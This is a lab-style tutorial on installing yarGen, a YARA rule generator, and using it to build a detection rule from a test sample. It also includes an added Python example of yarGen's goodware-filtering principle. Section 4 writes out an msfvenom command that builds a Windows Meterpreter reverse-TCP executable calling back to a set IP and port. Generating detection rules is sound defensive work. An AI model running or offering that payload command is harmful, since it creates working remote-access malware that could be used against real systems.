yarGen
1. Introduction
yarGen is a generator for YARA rules. Its main principle is to create rules from strings found in malware files while removing all strings that also appear in goodware files. To do this, yarGen ships a large goodware string and opcode database as ZIP archives, which have to be extracted before the first use.
The goal of this exercise is to install yarGen and use it to generate YARA rules automatically.
2. Installation
Please download yarGen.py using the commands below.
cd /home/hacker
git clone https://github.com/Neo23x0/yarGen.git
cd /home/hacker/yarGen
chmod +x ./yarGen.py
Install dependencies
cd /home/hacker/yarGen
pip install -r requirements.txt

3. Update the yarGen database
cd /home/hacker/yarGen
./yarGen.py --update

4. Create a malicious test binary
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.71.164 LPORT=443 -f exe -o malisciousfile.exe

mkdir -p /tmp/malware
cp malisciousfile.exe /tmp/malware
./yarGen.py -m /tmp/malware
This will generate a yargen_rules.yar file in the current directory.
Let's test it by running yara over the sample directory with the generated rule set; it should report a match for malisciousfile.exe:
yara -w -r ./yargen_rules.yar /tmp/malware
The generated yargen_rules.yar file looks like this:

/*
   YARA Rule Set
   Author: yarGen Rule Generator
   Date: 2022-04-25
   Identifier: malware
   Reference: https://github.com/Neo23x0/yarGen
*/

/* Rule Set ----------------------------------------------------------------- */

rule malisciousfile {
    meta:
        description = "malware - file malisciousfile.exe"
        author = "yarGen Rule Generator"
        reference = "https://github.com/Neo23x0/yarGen"
        date = "2022-04-25"
        hash1 = "51441af91003497318d9a396eeee7863d228ffc683335e05d669cf998cfae507"
    strings:
        $s1 = "C:\\local0\\asf\\release\\build-2.2.14\\support\\Release\\ab.pdb" fullword ascii
        $s2 = " Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/<br>" fullword ascii
        $s3 = " -T content-type Content-type header for POSTing, eg." fullword ascii
        $s4 = " -h Display usage information (this message)" fullword ascii
        $s5 = " -i Use HEAD instead of GET" fullword ascii
        $s6 = " -p postfile File containing data to POST. Remember also to set -T" fullword ascii
        $s7 = " This is ApacheBench, Version %s <i><%s></i><br>" fullword ascii
        $s8 = " -r Don't exit on socket receive errors." fullword ascii
        $s9 = " Licensed to The Apache Software Foundation, http://www.apache.org/<br>" fullword ascii
        $s10 = " -k Use HTTP KeepAlive feature" fullword ascii
        $s11 = " -X proxy:port Proxyserver and port number to use" fullword ascii
        $s12 = " %d%% %5I64d" fullword ascii
        $s13 = " -H attribute Add Arbitrary header line, eg. 'Accept-Encoding: gzip'" fullword ascii
        $s14 = " -v verbosity How much troubleshooting info to print" fullword ascii
        $s15 = " -z attributes String to insert as td or th attributes" fullword ascii
        $s16 = " -b windowsize Size of TCP send/receive buffer, in bytes" fullword ascii
        $s17 = " -e filename Output CSV file with percentages served" fullword ascii
        $s18 = " are a colon separated username and password." fullword ascii
        $s19 = " -x attributes String to insert as table attributes" fullword ascii
        $s20 = " -y attributes String to insert as tr attributes" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and
        8 of them
}
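To make the principle from the introduction concrete, here is an added Python example that is not yarGen's own code (yarGen is far more elaborate, with scoring and opcode handling). It extracts printable strings from a constructed stand-in for a PE sample, drops every string that also occurs in a constructed stand-in for the goodware database, emits a rule in the same shape as the generated rule above, and then hand-evaluates that rule's condition (the MZ magic check, the 200KB size limit and "N of them" with fullword semantics) against the sample and against a constructed benign file. The sample bytes, the goodware set and the clamping of the "N of them" count are all assumptions made for this example.

```python
import re
from typing import Iterable, List, Set

# Constructed stand-in for a PE sample: an "MZ" header followed by strings that
# are unique to the sample and strings that are also common in goodware.
# Every value here is made up for the example.
SAMPLE_BYTES = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"C:\\build\\example\\Release\\dropper.pdb\x00"
    b"GetProcAddress\x00LoadLibraryA\x00"
    b"ExampleMutex_7f3a\x00"
    b"Retry %d of %d failed, sleeping\x00"
    b"short\x00"
)

# Constructed stand-in for a benign PE that only contains common API names.
BENIGN_BYTES = b"MZ\x90\x00" + b"GetProcAddress\x00LoadLibraryA\x00kernel32.dll\x00"

# Constructed stand-in for yarGen's goodware string database.
GOODWARE_STRINGS: Set[str] = {
    "GetProcAddress",
    "LoadLibraryA",
    "kernel32.dll",
    "This program cannot be run in DOS mode.",
}


def extract_strings(data: bytes, min_len: int = 6) -> List[str]:
    """Return printable-ASCII runs of at least min_len bytes, like the `strings` tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def select_rule_strings(sample_strings: Iterable[str], goodware: Set[str],
                        max_strings: int = 20) -> List[str]:
    """yarGen's core idea: keep sample strings that never occur in goodware.

    Duplicates are dropped and the list is capped at max_strings (the generated
    rule above shows 20 strings)."""
    selected: List[str] = []
    for s in sample_strings:
        if s in goodware or s in selected:
            continue
        selected.append(s)
    return selected[:max_strings]


def yara_escape(s: str) -> str:
    """Escape backslashes and quotes for a YARA text string literal."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def build_rule(name: str, strings: List[str], min_hits: int = 8,
               max_size: str = "200KB") -> str:
    """Emit a rule in the same shape as the generated rule above.

    The "N of them" count is clamped to the number of strings so a sample with
    fewer than min_hits unique strings still yields a satisfiable rule (this
    clamp is a choice made for this example, not yarGen's exact logic)."""
    lines = [f"rule {name} {{", "    strings:"]
    for i, s in enumerate(strings, 1):
        lines.append(f'        $s{i} = "{yara_escape(s)}" fullword ascii')
    lines.append("    condition:")
    lines.append(f"        uint16(0) == 0x5a4d and filesize < {max_size} and")
    lines.append(f"        {min(min_hits, len(strings))} of them")
    lines.append("}")
    return "\n".join(lines)


def evaluate_condition(data: bytes, strings: List[str], min_hits: int,
                       max_size_bytes: int = 200 * 1024) -> bool:
    """Hand-evaluate the rule's condition the way YARA would.

    uint16(0) == 0x5a4d is little-endian for the bytes "MZ"; filesize < 200KB
    uses YARA's 1024-byte KB; "fullword" means the string is not bordered by
    alphanumeric characters."""
    if data[:2] != b"MZ" or len(data) >= max_size_bytes:
        return False
    hits = 0
    for s in strings:
        needle = rb"(?<![0-9A-Za-z])" + re.escape(s.encode("ascii")) + rb"(?![0-9A-Za-z])"
        if re.search(needle, data):
            hits += 1
    return hits >= min_hits


if __name__ == "__main__":
    chosen = select_rule_strings(extract_strings(SAMPLE_BYTES), GOODWARE_STRINGS)
    print(build_rule("example_dropper", chosen))
    print("sample matches:", evaluate_condition(SAMPLE_BYTES, chosen, 3))
    print("benign matches:", evaluate_condition(BENIGN_BYTES, chosen, 3))
```

Running the script prints a three-string rule (the two API names are filtered out because they are in the goodware set) and shows that the condition holds for the sample but not for the benign file. The same goodware-filtering step is why the real rule above is dominated by ApacheBench usage text: those strings were not in yarGen's goodware database, even though they are not specific to the payload, which is a reminder to review generated strings before deploying a rule.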